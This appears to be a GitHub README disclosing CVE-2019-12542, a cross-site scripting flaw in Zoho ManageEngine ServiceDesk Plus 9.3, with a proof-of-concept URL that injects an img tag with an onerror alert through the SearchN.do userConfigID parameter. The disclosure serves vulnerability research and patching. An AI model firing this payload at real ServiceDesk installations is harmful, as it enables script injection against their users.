Skip to content
No description, website, or topics provided.
Branch: master
Clone or download
Latest commit 7095d83 Jun 6, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Jun 6, 2019

README.md

CVE-2019-12542 Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability in SearchN.do

Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.

Author: Tarantula Team - VinCSS (a member of Vingroup)

Payload

domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1"><img src%3da onerror%3dalert('XSS')>&selectName=Site

You can’t perform that action at this time.